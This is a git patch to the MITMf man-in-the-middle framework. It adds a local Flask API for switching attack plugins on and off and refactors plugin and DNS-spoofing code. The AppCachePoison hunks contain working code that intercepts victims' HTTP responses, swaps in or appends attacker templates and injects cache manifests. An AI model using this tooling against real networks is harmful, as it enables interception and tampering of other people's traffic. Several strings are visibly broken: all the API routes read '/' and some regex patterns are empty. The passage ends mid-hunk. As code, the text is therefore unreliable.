From c5ad00822b4b0f20241f14cb2b8d94023900ddd7 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Fri, 19 Jun 2015 17:39:49 +0200 Subject: [PATCH] initial implementation of mitmfapi, thanks @xtr4nge :D --- core/configwatcher.py | 10 +-- core/mitmfapi.py | 99 +++++++++++++++++++++ core/sergioproxy/ProxyPlugins.py | 23 ++--- core/servers/dns/DNSchef.py | 24 ++--- core/sslstrip/ServerConnection.py | 9 +- mitmf.py | 96 ++------------------ plugins/AppCachePoison.py | 143 ++++++++++++++---------------- plugins/BrowserProfiler.py | 36 +++----- plugins/CacheKill.py | 15 +--- plugins/Replace.py | 48 ++++------ plugins/SMBTrap.py | 13 +-- plugins/Screenshotter.py | 35 +++----- plugins/Upsidedownternet.py | 53 +++++------ 13 files changed, 267 insertions(+), 337 deletions(-) create mode 100644 core/mitmfapi.py diff --git a/core/configwatcher.py b/core/configwatcher.py index beb8061..7179bda 100644 --- a/core/configwatcher.py +++ b/core/configwatcher.py @@ -14,6 +14,11 @@ class ConfigWatcher(FileSystemEventHandler): _instance = None config = ConfigObj("./config/mitmf.conf") + def __init__(self): + observer = Observer() + observer.schedule(self, path='./config', recursive=False) + observer.start() + @staticmethod def getInstance(): if ConfigWatcher._instance is None: @@ -21,11 +26,6 @@ class ConfigWatcher(FileSystemEventHandler): return ConfigWatcher._instance - def startConfigWatch(self): - observer = Observer() - observer.schedule(self, path='./config', recursive=False) - observer.start() - def getConfig(self): return self.config diff --git a/core/mitmfapi.py b/core/mitmfapi.py new file mode 100644 index 0000000..1bd6385 --- /dev/null +++ b/core/mitmfapi.py @@ -0,0 +1,99 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +""" + + Coded by @xtr4nge + +""" + +#import multiprocessing +import threading +import logging +import json +import sys + +from flask import Flask +from core.sergioproxy.ProxyPlugins import ProxyPlugins + +app = Flask(__name__) + +log = logging.getLogger('werkzeug') +log.setLevel(logging.DEBUG) + +class mitmfapi: + + @app.route("/") + def getPlugins(): + # example: http://127.0.0.1:9090/getPlugins + pdict = {} + + #print ProxyPlugins.getInstance().plist + for activated_plugin in ProxyPlugins.getInstance().plist: + pdict[activated_plugin.name] = True + + #print ProxyPlugins.getInstance().plist_all + for plugin in ProxyPlugins.getInstance().plist_all: + if plugin.name not in pdict: + pdict[plugin.name] = False + + #print ProxyPlugins.getInstance().pmthds + + return json.dumps(pdict) + + @app.route("/") + def getPluginStatus(plugin): + # example: http://127.0.0.1:9090/getPluginStatus/cachekill + for p in ProxyPlugins.getInstance().plist: + if plugin == p.name: + return json.dumps("1") + + return json.dumps("0") + + @app.route("//") + def setPluginStatus(plugin, status): + # example: http://127.0.0.1:9090/setPluginStatus/cachekill/1 # enabled + # example: http://127.0.0.1:9090/setPluginStatus/cachekill/0 # disabled + if status == "1": + for p in ProxyPlugins.getInstance().plist_all: + if (p.name == plugin) and (p not in ProxyPlugins.getInstance().plist): + ProxyPlugins.getInstance().addPlugin(p) + return json.dumps({"plugin": plugin, "response": "success"}) + + elif status == "0": + for p in ProxyPlugins.getInstance().plist: + if p.name == plugin: + ProxyPlugins.getInstance().removePlugin(p) + return json.dumps({"plugin": plugin, "response": "success"}) + + return json.dumps({"plugin": plugin, "response": "failed"}) + + def startFlask(self, host='127.0.0.1', port=9090): + app.run(host=host, port=port) + + #def start(self): + # api_thread = multiprocessing.Process(name="mitmfapi", target=self.startFlask) + # api_thread.daemon = True + # api_thread.start() + + def start(self): + api_thread = threading.Thread(name='mitmfapi', target=self.startFlask) + api_thread.setDaemon(True) + api_thread.start() \ No newline at end of file diff --git a/core/sergioproxy/ProxyPlugins.py b/core/sergioproxy/ProxyPlugins.py index 4a8a509..bbd4d9f 100644 --- a/core/sergioproxy/ProxyPlugins.py +++ b/core/sergioproxy/ProxyPlugins.py @@ -42,32 +42,25 @@ class ProxyPlugins: in handleResponse, but is still annoying. ''' _instance = None - - plist = [] mthdDict = {"connectionMade": "clientRequest", "handleStatus": "serverResponseStatus", "handleResponse": "serverResponse", "handleHeader": "serverHeaders", "handleEndHeaders":"serverHeaders"} - pmthds = {} + def __init__(self): + self.pmthds = {} + self.plist = [] + self.plist_all = [] @staticmethod def getInstance(): - if ProxyPlugins._instance == None: + if ProxyPlugins._instance is None: ProxyPlugins._instance = ProxyPlugins() return ProxyPlugins._instance - def setPlugins(self, plugins): - '''Set the plugins in use''' - - for p in plugins: - self.addPlugin(p) - - mitmf_logger.debug("[ProxyPlugins] Loaded {} plugin/s".format(len(self.plist))) - - def addPlugin(self,p): + def addPlugin(self, p): '''Load a plugin''' self.plist.append(p) mitmf_logger.debug("[ProxyPlugins] Adding {} plugin".format(p.name)) @@ -77,12 +70,12 @@ class ProxyPlugins: except KeyError: self.pmthds[mthd] = [getattr(p,pmthd)] - def removePlugin(self,p): + def removePlugin(self, p): '''Unload a plugin''' self.plist.remove(p) mitmf_logger.debug("[ProxyPlugins] Removing {} plugin".format(p.name)) for mthd,pmthd in self.mthdDict.iteritems(): - self.pmthds[mthd].remove(p) + self.pmthds[mthd].remove(getattr(p, pmthd)) def hook(self): '''Magic to hook various function calls in sslstrip''' diff --git a/core/servers/dns/DNSchef.py b/core/servers/dns/DNSchef.py index 9cf829d..e65ad33 100755 --- a/core/servers/dns/DNSchef.py +++ b/core/servers/dns/DNSchef.py @@ -419,14 +419,19 @@ class DNSChef(ConfigWatcher): _instance = None version = "0.4" - tcp = False - ipv6 = False - hsts = False - real_records = dict() - nametodns = dict() - server_address = "0.0.0.0" - nameservers = ["8.8.8.8"] - port = 53 + def __init__(self): + ConfigWatcher.__init__(self) + + self.tcp = False + self.ipv6 = False + self.hsts = False + self.real_records = dict() + self.nametodns = dict() + self.server_address = "0.0.0.0" + self.nameservers = ["8.8.8.8"] + self.port = 53 + + self.onConfigChange() @staticmethod def getInstance(): @@ -472,9 +477,6 @@ class DNSChef(ConfigWatcher): self.hsts = True def start(self): - self.onConfigChange() - self.startConfigWatch() - try: if self.config['MITMf']['DNS']['tcp'].lower() == 'on': self.startTCP() diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py index d88023d..6c167a7 100644 --- a/core/sslstrip/ServerConnection.py +++ b/core/sslstrip/ServerConnection.py @@ -60,7 +60,6 @@ class ServerConnection(HTTPClient): self.urlMonitor = URLMonitor.getInstance() self.hsts = URLMonitor.getInstance().hsts self.app = URLMonitor.getInstance().app - self.plugins = ProxyPlugins.getInstance() self.isImageRequest = False self.isCompressed = False self.contentLength = None @@ -108,7 +107,7 @@ class ServerConnection(HTTPClient): def connectionMade(self): mitmf_logger.debug("[ServerConnection] HTTP connection made.") - self.plugins.hook() + ProxyPlugins.getInstance().hook() self.sendRequest() self.sendHeaders() @@ -117,7 +116,7 @@ class ServerConnection(HTTPClient): def handleStatus(self, version, code, message): - values = self.plugins.hook() + values = ProxyPlugins.getInstance().hook() version = values['version'] code = values['code'] @@ -164,7 +163,7 @@ class ServerConnection(HTTPClient): if self.length == 0: self.shutdown() - self.plugins.hook() + ProxyPlugins.getInstance().hook() if logging.getLevelName(mitmf_logger.getEffectiveLevel()) == "DEBUG": for header, value in self.client.headers.iteritems(): @@ -191,7 +190,7 @@ class ServerConnection(HTTPClient): data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read() data = self.replaceSecureLinks(data) - data = self.plugins.hook()['data'] + data = ProxyPlugins.getInstance().hook()['data'] mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data))) diff --git a/mitmf.py b/mitmf.py index 4f0e37f..9ee2ef4 100755 --- a/mitmf.py +++ b/mitmf.py @@ -18,12 +18,6 @@ # USA # -""" - -[enabled | disabled] by @xtr4nge - -""" - import argparse import sys import os @@ -35,17 +29,9 @@ from twisted.internet import reactor from core.sslstrip.CookieCleaner import CookieCleaner from core.sergioproxy.ProxyPlugins import ProxyPlugins from core.utils import Banners, SystemConfig, shutdown +from core.mitmfapi import mitmfapi from plugins import * -# @xtr4nge -import multiprocessing, time, signal -from flask import Flask -from configobj import ConfigObj -import json - -# @xtr4nge -pluginStatus = ConfigObj("config/plugins.conf") - Banners().printBanner() if os.geteuid() != 0: @@ -81,6 +67,8 @@ plugins = [] try: for p in plugin_classes: plugins.append(p()) + + ProxyPlugins.getInstance().plist_all = plugins except Exception as e: print "[-] Failed to load plugin class {}: {}".format(p, e) @@ -143,10 +131,6 @@ for p in plugins: #load only the plugins that have been called at the command line if vars(args)[p.optname] is True: - # @xtr4nge - pluginStatus['plugins'][p.optname]['status'] = "enabled" - pluginStatus.write() - print "|_ {} v{}".format(p.name, p.version) if p.tree_info: for line in xrange(0, len(p.tree_info)): @@ -175,13 +159,14 @@ reactor.listenTCP(args.listen, strippingFactory) for p in ProxyPlugins.getInstance().plist: p.pluginReactor(strippingFactory) #we pass the default strippingFactory, so the plugins can use it - p.startConfigWatch() if hasattr(p, 'startThread'): t = threading.Thread(name='{}-Thread'.format(p.name), target=p.startThread) t.setDaemon(True) t.start() +mitmfapi().start() + print "|" print "|_ Sergio-Proxy v{} online".format(sergio_version) print "|_ SSLstrip v{} by Moxie Marlinspike online".format(sslstrip_version) @@ -206,77 +191,8 @@ from core.servers.smb.SMBserver import SMBserver print "|_ SMB server online [Mode: {}] (Impacket {}) \n".format(SMBserver.getInstance().server_type, SMBserver.getInstance().impacket_ver) SMBserver.getInstance().start() -''' #start the reactor reactor.run() print "\n" -shutdown() -''' - -# ------------------------------------ -# @xtr4nge [enabled | disabled] -# ------------------------------------ -app = Flask(__name__) - -@app.route("/getPlugins") -def getPlugins(): - # Lists all the plugins supporting [enabled|disabled] (check: config/plugins.conf) - # example: http://127.0.0.1:9090/getPlugins - pluginList = {"cachekill", "screen", "browserprofiler", "appoison", "replace", "smbtrap", "upsidedownternet"} - - data = {} - for item in pluginList: - data[item] = [pluginStatus['plugins'][item]['status']] - - return json.dumps(data) - -@app.route("/getPluginStatus/") -def getPluginStatus(plugin): - # example: http://127.0.0.1:9090/getPluginStatus/cachekill - return pluginStatus['plugins'][plugin]['status'] - -@app.route("/setPluginStatus//") -def setPluginStatus(plugin, status): - # example: http://127.0.0.1:9090/setPluginStatus/cachekill/1 # enabled - # example: http://127.0.0.1:9090/setPluginStatus/cachekill/0 # disabled - if status == "1": - pluginStatus['plugins'][plugin]['status'] = "enabled" - pluginStatus.write() - elif status == "0": - pluginStatus['plugins'][plugin]['status'] = "disabled" - pluginStatus.write() - - return getPluginStatus(plugin) - -# @xtr4nge -def startFlask(): - app.run(host='127.0.0.1', port=9090) - -# @xtr4nge -def startCore(): - #start the reactor - reactor.run() - -# @xtr4nge -try: - pool = {} - pool[0] = multiprocessing.Process(name="core", target=startCore) - pool[1] = multiprocessing.Process(name="api", target=startFlask) - pool[0].start() - pool[1].start() - - while True: - pass - -except KeyboardInterrupt: - shutdown() - pool[0].terminate() - pool[1].terminate() -except Exception as e: - print e - shutdown() - pool[0].terminate() - pool[1].terminate() -finally: - print "bye ;)" \ No newline at end of file +shutdown() \ No newline at end of file diff --git a/plugins/AppCachePoison.py b/plugins/AppCachePoison.py index e66234b..ccb6aee 100644 --- a/plugins/AppCachePoison.py +++ b/plugins/AppCachePoison.py @@ -34,8 +34,6 @@ from datetime import date from plugins.plugin import Plugin from core.sslstrip.URLMonitor import URLMonitor -from configobj import ConfigObj - mitmf_logger = logging.getLogger("mitmf") class AppCachePlugin(Plugin): @@ -45,14 +43,6 @@ class AppCachePlugin(Plugin): version = "0.3" has_opts = False - # @xtr4nge - def getStatus(self): - self.pluginStatus = ConfigObj("config/plugins.conf") - if self.pluginStatus['plugins'][self.optname]['status'] == "enabled": - return True - else: - return False - def initialize(self, options): self.options = options self.mass_poisoned_browsers = [] @@ -61,73 +51,72 @@ class AppCachePlugin(Plugin): self.urlMonitor.setAppCachePoisoning() def serverResponse(self, response, request, data): - if self.getStatus(): - #This code was literally copied + pasted from Koto's sslstrip fork, def need to clean this up in the near future - - self.app_config = self.config['AppCachePoison'] # so we reload the config on each request - url = request.client.uri - req_headers = request.client.getAllHeaders() - headers = request.client.responseHeaders - ip = request.client.getClientIP() - - ######################################################################### - - if "enable_only_in_useragents" in self.app_config: - regexp = self.app_config["enable_only_in_useragents"] - if regexp and not re.search(regexp,req_headers["user-agent"]): - mitmf_logger.info("{} [{}] Tampering disabled in this useragent ({})".format(ip, self.name, req_headers["user-agent"])) - return {'response': response, 'request': request, 'data': data} - - urls = self.urlMonitor.getRedirectionSet(url) - mitmf_logger.debug("{} [{}] Got redirection set: {}".format(ip,self.name, urls)) - (name,s,element,url) = self.getSectionForUrls(urls) - - if s is False: - data = self.tryMassPoison(url, data, headers, req_headers, ip) - return {'response': response, 'request': request, 'data': data} - - mitmf_logger.info("{} [{}] Found URL {} in section {}".format(ip, self.name, url, name)) - p = self.getTemplatePrefix(s) - - if element == 'tamper': - mitmf_logger.info("{} [{}] Poisoning tamper URL with template {}".format(ip, self.name, p)) - if os.path.exists(p + '.replace'): # replace whole content - f = open(p + '.replace','r') - data = self.decorate(f.read(), s) - f.close() - - elif os.path.exists(p + '.append'): # append file to body - f = open(p + '.append','r') - appendix = self.decorate(f.read(), s) - f.close() - # append to body - data = re.sub(re.compile("",re.IGNORECASE),appendix + "", data) - - # add manifest reference - data = re.sub(re.compile("",re.IGNORECASE),appendix + "", data) + + # add manifest reference + data = re.sub(re.compile("